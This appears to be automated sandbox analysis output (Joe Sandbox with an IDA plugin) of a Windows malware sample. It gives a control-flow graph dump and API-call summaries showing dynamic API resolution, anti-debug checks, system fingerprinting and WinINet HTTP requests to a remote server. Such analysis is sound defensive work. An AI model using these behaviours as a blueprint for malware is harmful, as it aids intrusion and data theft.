14482 9ba7a0 lstrcpy 14481->14482 14483 9a15d9 14482->14483 14484 9ba7a0 lstrcpy 14483->14484 14485 9a1663 14484->14485 14486 9b5510 14485->14486 14487 9b5521 14486->14487 14488 9ba820 2 API calls 14487->14488 14489 9b552e 14488->14489 14490 9ba820 2 API calls 14489->14490 14491 9b553b 14490->14491 14492 9ba820 2 API calls 14491->14492 14493 9b5548 14492->14493 14494 9ba740 lstrcpy 14493->14494 14495 9b5555 14494->14495 14496 9ba740 lstrcpy 14495->14496 14497 9b5562 14496->14497 14498 9ba740 lstrcpy 14497->14498 14499 9b556f 14498->14499 14500 9ba740 lstrcpy 14499->14500 14525 9b557c 14500->14525 14501 9a1590 lstrcpy 14501->14525 14502 9b52c0 25 API calls 14502->14525 14503 9b5643 StrCmpCA 14503->14525 14504 9b56a0 StrCmpCA 14505 9b57dc 14504->14505 14504->14525 14506 9ba8a0 lstrcpy 14505->14506 14507 9b57e8 14506->14507 14508 9ba820 2 API calls 14507->14508 14509 9b57f6 14508->14509 14511 9ba820 2 API calls 14509->14511 14510 9b5856 StrCmpCA 14512 9b5991 14510->14512 14510->14525 14516 9b5805 14511->14516 14515 9ba8a0 lstrcpy 14512->14515 14513 9ba740 lstrcpy 14513->14525 14514 9ba8a0 lstrcpy 14514->14525 14517 9b599d 14515->14517 14518 9a1670 lstrcpy 14516->14518 14520 9ba820 2 API calls 14517->14520 14521 9b5811 14518->14521 14519 9ba820 lstrlen lstrcpy 14519->14525 14522 9b59ab 14520->14522 14521->13593 14526 9ba820 2 API calls 14522->14526 14523 9b5a0b StrCmpCA 14527 9b5a28 14523->14527 14528 9b5a16 Sleep 14523->14528 14524 9ba7a0 lstrcpy 14524->14525 14525->14501 14525->14502 14525->14503 14525->14504 14525->14510 14525->14513 14525->14514 14525->14519 14525->14523 14525->14524 14535 9b51f0 20 API calls 14525->14535 14538 9b578a StrCmpCA 14525->14538 14540 9b593f StrCmpCA 14525->14540 14530 9b59ba 14526->14530 14529 9ba8a0 lstrcpy 14527->14529 14528->14525 14531 9b5a34 14529->14531 14532 9a1670 lstrcpy 14530->14532 14533 9ba820 2 API calls 14531->14533 14532->14521 14534 9b5a43 14533->14534 14536 9ba820 2 API calls 14534->14536 14535->14525 14537 9b5a52 
14536->14537 14539 9a1670 lstrcpy 14537->14539 14538->14525 14539->14521 14540->14525 14542 9b754c 14541->14542 14543 9b7553 GetVolumeInformationA 14541->14543 14542->14543 14547 9b7591 14543->14547 14544 9b75fc GetProcessHeap RtlAllocateHeap 14545 9b7619 14544->14545 14546 9b7628 wsprintfA 14544->14546 14548 9ba740 lstrcpy 14545->14548 14549 9ba740 lstrcpy 14546->14549 14547->14544 14550 9b5da7 14548->14550 14549->14550 14550->13614 14552 9ba7a0 lstrcpy 14551->14552 14553 9a4899 14552->14553 15604 9a47b0 14553->15604 14555 9a48a5 14556 9ba740 lstrcpy 14555->14556 14557 9a48d7 14556->14557 14558 9ba740 lstrcpy 14557->14558 14559 9a48e4 14558->14559 14560 9ba740 lstrcpy 14559->14560 14561 9a48f1 14560->14561 14562 9ba740 lstrcpy 14561->14562 14563 9a48fe 14562->14563 14564 9ba740 lstrcpy 14563->14564 14565 9a490b InternetOpenA StrCmpCA 14564->14565 14566 9a4944 14565->14566 14567 9a4ecb InternetCloseHandle 14566->14567 14568 9a4955 14566->14568 14570 9a4ee8 14567->14570 15615 9b8b60 14568->15615 15610 9a9ac0 CryptStringToBinaryA 14570->15610 14571 9a4963 15623 9ba920 14571->15623 14574 9a4976 14576 9ba8a0 lstrcpy 14574->14576 14581 9a497f 14576->14581 14577 9ba820 2 API calls 14578 9a4f05 14577->14578 14580 9ba9b0 4 API calls 14578->14580 14579 9a4f27 ctype 14583 9ba7a0 lstrcpy 14579->14583 14582 9a4f1b 14580->14582 14585 9ba9b0 4 API calls 14581->14585 14584 9ba8a0 lstrcpy 14582->14584 14596 9a4f57 14583->14596 14584->14579 14586 9a49a9 14585->14586 14587 9ba8a0 lstrcpy 14586->14587 14588 9a49b2 14587->14588 14589 9ba9b0 4 API calls 14588->14589 14590 9a49d1 14589->14590 14591 9ba8a0 lstrcpy 14590->14591 14592 9a49da 14591->14592 14593 9ba920 3 API calls 14592->14593 14594 9a49f8 14593->14594 14595 9ba8a0 lstrcpy 14594->14595 14597 9a4a01 14595->14597 14596->13617 14598 9ba9b0 4 API calls 14597->14598 14599 9a4a20 14598->14599 14600 9ba8a0 lstrcpy 14599->14600 14601 9a4a29 14600->14601 14602 9ba9b0 4 API calls 14601->14602 14603 9a4a48 14602->14603 14604 9ba8a0 
lstrcpy 14603->14604 14605 9a4a51 14604->14605 14606 9ba9b0 4 API calls 14605->14606 14607 9a4a7d 14606->14607 14608 9ba920 3 API calls 14607->14608 14609 9a4a84 14608->14609 14610 9ba8a0 lstrcpy 14609->14610 14611 9a4a8d 14610->14611 14612 9a4aa3 InternetConnectA 14611->14612 14612->14567 14613 9a4ad3 HttpOpenRequestA 14612->14613 14615 9a4b28 14613->14615 14616 9a4ebe InternetCloseHandle 14613->14616 14617 9ba9b0 4 API calls 14615->14617 14616->14567 14618 9a4b3c 14617->14618 14619 9ba8a0 lstrcpy 14618->14619 14620 9a4b45 14619->14620 14621 9ba920 3 API calls 14620->14621 14622 9a4b63 14621->14622 14623 9ba8a0 lstrcpy 14622->14623 14624 9a4b6c 14623->14624 14625 9ba9b0 4 API calls 14624->14625 14626 9a4b8b 14625->14626 14627 9ba8a0 lstrcpy 14626->14627 14628 9a4b94 14627->14628 14629 9ba9b0 4 API calls 14628->14629 14630 9a4bb5 14629->14630 14631 9ba8a0 lstrcpy 14630->14631 14632 9a4bbe 14631->14632 14633 9ba9b0 4 API calls 14632->14633 14634 9a4bde 14633->14634 14635 9ba8a0 lstrcpy 14634->14635 14636 9a4be7 14635->14636 14637 9ba9b0 4 API calls 14636->14637 14638 9a4c06 14637->14638 14639 9ba8a0 lstrcpy 14638->14639 14640 9a4c0f 14639->14640 14641 9ba920 3 API calls 14640->14641 14642 9a4c2d 14641->14642 14643 9ba8a0 lstrcpy 14642->14643 14644 9a4c36 14643->14644 14645 9ba9b0 4 API calls 14644->14645 14646 9a4c55 14645->14646 14647 9ba8a0 lstrcpy 14646->14647 14648 9a4c5e 14647->14648 14649 9ba9b0 4 API calls 14648->14649 14650 9a4c7d 14649->14650 14651 9ba8a0 lstrcpy 14650->14651 14652 9a4c86 14651->14652 14653 9ba920 3 API calls 14652->14653 14654 9a4ca4 14653->14654 14655 9ba8a0 lstrcpy 14654->14655 14656 9a4cad 14655->14656 14657 9ba9b0 4 API calls 14656->14657 14658 9a4ccc 14657->14658 14659 9ba8a0 lstrcpy 14658->14659 14660 9a4cd5 14659->14660 14661 9ba9b0 4 API calls 14660->14661 14662 9a4cf6 14661->14662 14663 9ba8a0 lstrcpy 14662->14663 14664 9a4cff 14663->14664 14665 9ba9b0 4 API calls 14664->14665 14666 9a4d1f 14665->14666 14667 9ba8a0 lstrcpy 
14666->14667 14668 9a4d28 14667->14668 14669 9ba9b0 4 API calls 14668->14669 14670 9a4d47 14669->14670 14671 9ba8a0 lstrcpy 14670->14671 14672 9a4d50 14671->14672 14673 9ba920 3 API calls 14672->14673 14674 9a4d6e 14673->14674 14675 9ba8a0 lstrcpy 14674->14675 14676 9a4d77 14675->14676 14677 9ba740 lstrcpy 14676->14677 14678 9a4d92 14677->14678 14679 9ba920 3 API calls 14678->14679 14680 9a4db3 14679->14680 14681 9ba920 3 API calls 14680->14681 14682 9a4dba 14681->14682 14683 9ba8a0 lstrcpy 14682->14683 14684 9a4dc6 14683->14684 14685 9a4de7 lstrlen 14684->14685 14686 9a4dfa 14685->14686 14687 9a4e03 lstrlen 14686->14687 15629 9baad0 14687->15629 14689 9a4e13 HttpSendRequestA 14690 9a4e32 InternetReadFile 14689->14690 14691 9a4e67 InternetCloseHandle 14690->14691 14696 9a4e5e 14690->14696 14693 9ba800 14691->14693 14693->14616 14694 9ba9b0 4 API calls 14694->14696 14695 9ba8a0 lstrcpy 14695->14696 14696->14690 14696->14691 14696->14694 14696->14695 15631 9baad0 14697->15631 14699 9b17c4 StrCmpCA 14700 9b17cf ExitProcess 14699->14700 14711 9b17d7 14699->14711 14701 9b187f StrCmpCA 14701->14711 14702 9b185d StrCmpCA 14702->14711 14703 9b1913 StrCmpCA 14703->14711 14704 9b1932 StrCmpCA 14704->14711 14705 9b18f1 StrCmpCA 14705->14711 14706 9b1951 StrCmpCA 14706->14711 14707 9b1970 StrCmpCA 14707->14711 14708 9b18cf StrCmpCA 14708->14711 14709 9b18ad StrCmpCA 14709->14711 14710 9b19c2 14710->13619 14711->14701 14711->14702 14711->14703 14711->14704 14711->14705 14711->14706 14711->14707 14711->14708 14711->14709 14711->14710 14712 9ba820 lstrlen lstrcpy 14711->14712 14712->14711 14714 9ba7a0 lstrcpy 14713->14714 14715 9a5979 14714->14715 14716 9a47b0 2 API calls 14715->14716 14717 9a5985 14716->14717 14718 9ba740 lstrcpy 14717->14718 14719 9a59ba 14718->14719 14720 9ba740 lstrcpy 14719->14720 14721 9a59c7 14720->14721 14722 9ba740 lstrcpy 14721->14722 14723 9a59d4 14722->14723 14724 9ba740 lstrcpy 14723->14724 14725 9a59e1 14724->14725 14726 9ba740 lstrcpy 14725->14726 
14727 9a59ee InternetOpenA StrCmpCA 14726->14727 14728 9a5a1d 14727->14728 14729 9a5fc3 InternetCloseHandle 14728->14729 14730 9b8b60 3 API calls 14728->14730 14731 9a5fe0 14729->14731 14732 9a5a3c 14730->14732 14734 9a9ac0 4 API calls 14731->14734 14733 9ba920 3 API calls 14732->14733 14735 9a5a4f 14733->14735 14736 9a5fe6 14734->14736 14737 9ba8a0 lstrcpy 14735->14737 14738 9ba820 2 API calls 14736->14738 14741 9a601f ctype 14736->14741 14743 9a5a58 14737->14743 14739 9a5ffd 14738->14739 14740 9ba9b0 4 API calls 14739->14740 14742 9a6013 14740->14742 14745 9ba7a0 lstrcpy 14741->14745 14744 9ba8a0 lstrcpy 14742->14744 14746 9ba9b0 4 API calls 14743->14746 14744->14741 14754 9a604f 14745->14754 14747 9a5a82 14746->14747 14748 9ba8a0 lstrcpy 14747->14748 14749 9a5a8b 14748->14749 14750 9ba9b0 4 API calls 14749->14750 14751 9a5aaa 14750->14751 14752 9ba8a0 lstrcpy 14751->14752 14753 9a5ab3 14752->14753 14755 9ba920 3 API calls 14753->14755 14754->13625 14756 9a5ad1 14755->14756 14757 9ba8a0 lstrcpy 14756->14757 14758 9a5ada 14757->14758 14759 9ba9b0 4 API calls 14758->14759 14760 9a5af9 14759->14760 14761 9ba8a0 lstrcpy 14760->14761 14762 9a5b02 14761->14762 14763 9ba9b0 4 API calls 14762->14763 14764 9a5b21 14763->14764 14765 9ba8a0 lstrcpy 14764->14765 14766 9a5b2a 14765->14766 14767 9ba9b0 4 API calls 14766->14767 14768 9a5b56 14767->14768 14769 9ba920 3 API calls 14768->14769 14770 9a5b5d 14769->14770 14771 9ba8a0 lstrcpy 14770->14771 14772 9a5b66 14771->14772 14773 9a5b7c InternetConnectA 14772->14773 14773->14729 14774 9a5bac HttpOpenRequestA 14773->14774 14776 9a5c0b 14774->14776 14777 9a5fb6 InternetCloseHandle 14774->14777 14778 9ba9b0 4 API calls 14776->14778 14777->14729 14779 9a5c1f 14778->14779 14780 9ba8a0 lstrcpy 14779->14780 14781 9a5c28 14780->14781 14782 9ba920 3 API calls 14781->14782 14783 9a5c46 14782->14783 14784 9ba8a0 lstrcpy 14783->14784 14785 9a5c4f 14784->14785 14786 9ba9b0 4 API calls 14785->14786 14787 9a5c6e 14786->14787 14788 9ba8a0 
lstrcpy 14787->14788 14789 9a5c77 14788->14789 14790 9ba9b0 4 API calls 14789->14790 14791 9a5c98 14790->14791 14792 9ba8a0 lstrcpy 14791->14792 14793 9a5ca1 14792->14793 14794 9ba9b0 4 API calls 14793->14794 14795 9a5cc1 14794->14795 14796 9ba8a0 lstrcpy 14795->14796 14797 9a5cca 14796->14797 14798 9ba9b0 4 API calls 14797->14798 14799 9a5ce9 14798->14799 14800 9ba8a0 lstrcpy 14799->14800 14801 9a5cf2 14800->14801 14802 9ba920 3 API calls 14801->14802 14803 9a5d10 14802->14803 14804 9ba8a0 lstrcpy 14803->14804 14805 9a5d19 14804->14805 14806 9ba9b0 4 API calls 14805->14806 14807 9a5d38 14806->14807 14808 9ba8a0 lstrcpy 14807->14808 14809 9a5d41 14808->14809 14810 9ba9b0 4 API calls 14809->14810 14811 9a5d60 14810->14811 14812 9ba8a0 lstrcpy 14811->14812 14813 9a5d69 14812->14813 14814 9ba920 3 API calls 14813->14814 14815 9a5d87 14814->14815 14816 9ba8a0 lstrcpy 14815->14816 14817 9a5d90 14816->14817 14818 9ba9b0 4 API calls 14817->14818 14819 9a5daf 14818->14819 14820 9ba8a0 lstrcpy 14819->14820 14821 9a5db8 14820->14821 14822 9ba9b0 4 API calls 14821->14822 14823 9a5dd9 14822->14823 14824 9ba8a0 lstrcpy 14823->14824 14825 9a5de2 14824->14825 14826 9ba9b0 4 API calls 14825->14826 14827 9a5e02 14826->14827 14828 9ba8a0 lstrcpy 14827->14828 14829 9a5e0b 14828->14829 14830 9ba9b0 4 API calls 14829->14830 14831 9a5e2a 14830->14831 14832 9ba8a0 lstrcpy 14831->14832 14833 9a5e33 14832->14833 14834 9ba920 3 API calls 14833->14834 14835 9a5e54 14834->14835 14836 9ba8a0 lstrcpy 14835->14836 14837 9a5e5d 14836->14837 14838 9a5e70 lstrlen 14837->14838 15632 9baad0 14838->15632 14840 9a5e81 lstrlen GetProcessHeap RtlAllocateHeap 15633 9baad0 14840->15633 14842 9a5eae lstrlen 14843 9a5ebe 14842->14843 14844 9a5ed7 lstrlen 14843->14844 14845 9a5ee7 14844->14845 14846 9a5ef0 lstrlen 14845->14846 14847 9a5f04 14846->14847 14848 9a5f1a lstrlen 14847->14848 15634 9baad0 14848->15634 14850 9a5f2a HttpSendRequestA 14851 9a5f35 InternetReadFile 14850->14851 14852 9a5f6a 
InternetCloseHandle 14851->14852 14853 9a5f61 14851->14853 14852->14777 14853->14851 14853->14852 14855 9ba9b0 4 API calls 14853->14855 14856 9ba8a0 lstrcpy 14853->14856 14855->14853 14856->14853 14859 9b1077 14857->14859 14858 9b1151 14858->13627 14859->14858 14860 9ba820 lstrlen lstrcpy 14859->14860 14860->14859 14863 9b0db7 14861->14863 14862 9b0f17 14862->13635 14863->14862 14864 9b0e27 StrCmpCA 14863->14864 14865 9b0e67 StrCmpCA 14863->14865 14866 9b0ea4 StrCmpCA 14863->14866 14867 9ba820 lstrlen lstrcpy 14863->14867 14864->14863 14865->14863 14866->14863 14867->14863 14869 9b0f67 14868->14869 14870 9b1044 14869->14870 14871 9b0fb2 StrCmpCA 14869->14871 14872 9ba820 lstrlen lstrcpy 14869->14872 14870->13643 14871->14869 14872->14869 14874 9ba740 lstrcpy 14873->14874 14875 9b1a26 14874->14875 14876 9ba9b0 4 API calls 14875->14876 14877 9b1a37 14876->14877 14878 9ba8a0 lstrcpy 14877->14878 14879 9b1a40 14878->14879 14880 9ba9b0 4 API calls 14879->14880 14881 9b1a5b 14880->14881 14882 9ba8a0 lstrcpy 14881->14882 14883 9b1a64 14882->14883 14884 9ba9b0 4 API calls 14883->14884 14885 9b1a7d 14884->14885 14886 9ba8a0 lstrcpy 14885->14886 14887 9b1a86 14886->14887 14888 9ba9b0 4 API calls 14887->14888 14889 9b1aa1 14888->14889 14890 9ba8a0 lstrcpy 14889->14890 14891 9b1aaa 14890->14891 14892 9ba9b0 4 API calls 14891->14892 14893 9b1ac3 14892->14893 14894 9ba8a0 lstrcpy 14893->14894 14895 9b1acc 14894->14895 14896 9ba9b0 4 API calls 14895->14896 14897 9b1ae7 14896->14897 14898 9ba8a0 lstrcpy 14897->14898 14899 9b1af0 14898->14899 14900 9ba9b0 4 API calls 14899->14900 14901 9b1b09 14900->14901 14902 9ba8a0 lstrcpy 14901->14902 14903 9b1b12 14902->14903 14904 9ba9b0 4 API calls 14903->14904 14905 9b1b2d 14904->14905 14906 9ba8a0 lstrcpy 14905->14906 14907 9b1b36 14906->14907 14908 9ba9b0 4 API calls 14907->14908 14909 9b1b4f 14908->14909 14910 9ba8a0 lstrcpy 14909->14910 14911 9b1b58 14910->14911 14912 9ba9b0 4 API calls 14911->14912 14913 9b1b76 14912->14913 14914 
9ba8a0 lstrcpy 14913->14914 14915 9b1b7f 14914->14915 14916 9b7500 6 API calls 14915->14916 14917 9b1b96 14916->14917 14918 9ba920 3 API calls 14917->14918 14919 9b1ba9 14918->14919 14920 9ba8a0 lstrcpy 14919->14920 14921 9b1bb2 14920->14921 14922 9ba9b0 4 API calls 14921->14922 14923 9b1bdc 14922->14923 14924 9ba8a0 lstrcpy 14923->14924 14925 9b1be5 14924->14925 14926 9ba9b0 4 API calls 14925->14926 14927 9b1c05 14926->14927 14928 9ba8a0 lstrcpy 14927->14928 14929 9b1c0e 14928->14929 15635 9b7690 GetProcessHeap RtlAllocateHeap 14929->15635 14932 9ba9b0 4 API calls 14933 9b1c2e 14932->14933 14934 9ba8a0 lstrcpy 14933->14934 14935 9b1c37 14934->14935 14936 9ba9b0 4 API calls 14935->14936 14937 9b1c56 14936->14937 14938 9ba8a0 lstrcpy 14937->14938 14939 9b1c5f 14938->14939 14940 9ba9b0 4 API calls 14939->14940 14941 9b1c80 14940->14941 14942 9ba8a0 lstrcpy 14941->14942 14943 9b1c89 14942->14943 15642 9b77c0 GetCurrentProcess IsWow64Process 14943->15642 14946 9ba9b0 4 API calls 14947 9b1ca9 14946->14947 14948 9ba8a0 lstrcpy 14947->14948 14949 9b1cb2 14948->14949 14950 9ba9b0 4 API calls 14949->14950 14951 9b1cd1 14950->14951 14952 9ba8a0 lstrcpy 14951->14952 14953 9b1cda 14952->14953 14954 9ba9b0 4 API calls 14953->14954 14955 9b1cfb 14954->14955 14956 9ba8a0 lstrcpy 14955->14956 14957 9b1d04 14956->14957 14958 9b7850 3 API calls 14957->14958 14959 9b1d14 14958->14959 14960 9ba9b0 4 API calls 14959->14960 14961 9b1d24 14960->14961 14962 9ba8a0 lstrcpy 14961->14962 14963 9b1d2d 14962->14963 14964 9ba9b0 4 API calls 14963->14964 14965 9b1d4c 14964->14965 14966 9ba8a0 lstrcpy 14965->14966 14967 9b1d55 14966->14967 14968 9ba9b0 4 API calls 14967->14968 14969 9b1d75 14968->14969 14970 9ba8a0 lstrcpy 14969->14970 14971 9b1d7e 14970->14971 14972 9b78e0 3 API calls 14971->14972 14973 9b1d8e 14972->14973 14974 9ba9b0 4 API calls 14973->14974 14975 9b1d9e 14974->14975 14976 9ba8a0 lstrcpy 14975->14976 14977 9b1da7 14976->14977 14978 9ba9b0 4 API calls 14977->14978 14979 9b1dc6 

                  Control-flow Graph

                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,015E3060), ref: 009B98A1
                  • GetProcAddress.KERNEL32(74DD0000,015E2F40), ref: 009B98BA
                  • GetProcAddress.KERNEL32(74DD0000,015E30D8), ref: 009B98D2
                  • GetProcAddress.KERNEL32(74DD0000,015E3030), ref: 009B98EA
                  • GetProcAddress.KERNEL32(74DD0000,015E3108), ref: 009B9903
                  • GetProcAddress.KERNEL32(74DD0000,015E9CD8), ref: 009B991B
                  • GetProcAddress.KERNEL32(74DD0000,015D6F30), ref: 009B9933
                  • GetProcAddress.KERNEL32(74DD0000,015D6F70), ref: 009B994C
                  • GetProcAddress.KERNEL32(74DD0000,015E2FD0), ref: 009B9964
                  • GetProcAddress.KERNEL32(74DD0000,015E3048), ref: 009B997C
                  • GetProcAddress.KERNEL32(74DD0000,015E3000), ref: 009B9995
                  • GetProcAddress.KERNEL32(74DD0000,015E2FB8), ref: 009B99AD
                  • GetProcAddress.KERNEL32(74DD0000,015D6DB0), ref: 009B99C5
                  • GetProcAddress.KERNEL32(74DD0000,015E2FE8), ref: 009B99DE
                  • GetProcAddress.KERNEL32(74DD0000,015E3078), ref: 009B99F6
                  • GetProcAddress.KERNEL32(74DD0000,015D7050), ref: 009B9A0E
                  • GetProcAddress.KERNEL32(74DD0000,015E30F0), ref: 009B9A27
                  • GetProcAddress.KERNEL32(74DD0000,015E3090), ref: 009B9A3F
                  • GetProcAddress.KERNEL32(74DD0000,015D6DD0), ref: 009B9A57
                  • GetProcAddress.KERNEL32(74DD0000,015E2EF8), ref: 009B9A70
                  • GetProcAddress.KERNEL32(74DD0000,015D6FB0), ref: 009B9A88
                  • LoadLibraryA.KERNEL32(015E30A8,?,009B6A00), ref: 009B9A9A
                  • LoadLibraryA.KERNEL32(015E3120,?,009B6A00), ref: 009B9AAB
                  • LoadLibraryA.KERNEL32(015E3138,?,009B6A00), ref: 009B9ABD
                  • LoadLibraryA.KERNEL32(015E3198,?,009B6A00), ref: 009B9ACF
                  • LoadLibraryA.KERNEL32(015E31B0,?,009B6A00), ref: 009B9AE0
                  • GetProcAddress.KERNEL32(75A70000,015E3150), ref: 009B9B02
                  • GetProcAddress.KERNEL32(75290000,015E31C8), ref: 009B9B23
                  • GetProcAddress.KERNEL32(75290000,015E2F10), ref: 009B9B3B
                  • GetProcAddress.KERNEL32(75BD0000,015E2F28), ref: 009B9B5D
                  • GetProcAddress.KERNEL32(75450000,015D6DF0), ref: 009B9B7E
                  • GetProcAddress.KERNEL32(76E90000,015E9C68), ref: 009B9B9F
                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 009B9BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 009B9BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 1754d24ad8e615fdb5fbc647667949b8a8940382955a343d64b8f0554bad1acb
                  • Instruction ID: 71c74f74988776f038634bdaafb95a0579f970e4602478719133312ef5d9b3f6
                  • Opcode Fuzzy Hash: 1754d24ad8e615fdb5fbc647667949b8a8940382955a343d64b8f0554bad1acb
                  • Instruction Fuzzy Hash: 7DA11BB95102C09FD354EFA8EDC8A563BFDF788301705851EA605CB264DE39B881DB63

                  Control-flow Graph

                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 009A479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A477B, 009A4638, 009A4765, 009A4643, 009A4657, 009A45F3, 009A4622, 009A466D, 009A475A, 009A46C2, 009A46AC, 009A474F, 009A46D8, 009A462D, 009A4729, 009A4734, 009A4683, 009A46CD, 009A46B7, 009A471E, 009A45DD, 009A45D2, 009A45E8, 009A45C7, 009A4713, 009A4662, 009A4770, 009A4678, 009A473F, 009A4617
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, once per xref listed under Strings)
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 194d1042ef4692720d8df5bb649167036bed7fa5edcb578a89335df5017e8b69
                  • Instruction ID: b0f3c9992c98dc9b05b0c697bc0a99f48e6889b7d10b7102d52bf7ee7496a1c5
                  • Opcode Fuzzy Hash: 194d1042ef4692720d8df5bb649167036bed7fa5edcb578a89335df5017e8b69
                  • Instruction Fuzzy Hash: C4410460BD16456BCF24F7B4896DFAD76665FC2718BC9B28CEC6052280CAB065C0C5EF

                  Control-flow Graph

                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                    • Part of subcall function 009A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • InternetOpenA.WININET(009C0DFE,00000001,00000000,00000000,00000000), ref: 009A62E1
                  • StrCmpCA.SHLWAPI(?,015EF828), ref: 009A6303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A6335
                  • HttpOpenRequestA.WININET(00000000,GET,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A6385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009A63BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A63D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009A63FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009A646D
                  • InternetCloseHandle.WININET(00000000), ref: 009A64EF
                  • InternetCloseHandle.WININET(00000000), ref: 009A64F9
                  • InternetCloseHandle.WININET(00000000), ref: 009A6503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
